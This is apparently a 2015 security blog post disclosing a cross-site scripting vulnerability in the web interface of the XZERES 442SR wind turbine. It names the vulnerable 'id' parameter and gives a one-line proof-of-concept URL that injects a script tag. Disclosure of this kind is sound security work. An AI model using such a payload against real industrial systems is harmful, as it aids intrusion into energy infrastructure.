Thursday, December 24, 2015

[ICS] XZERES 442SR Wind Turbine XSS Vulnerability

[ICS] XZERES 442SR Wind Turbine Cross-site Scripting Vulnerability


AFFECTED PRODUCTS
XZERES is a US-based energy company that maintains offices in several countries around the world, including the UK, Italy, Japan, Vietnam, Philippines, and Myanmar.

The affected product, 442SR Wind Turbine, has a web-based interface system. According to XZERES, the 442SR is deployed across the Energy sector. XZERES estimates that this product is used worldwide.

Reference

Vulnerable parameter
id

PoC
http://<IP>/details?object=Inverter&id=2<script>alert(xss-id-parameter") </script>


No comments:

Post a Comment

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.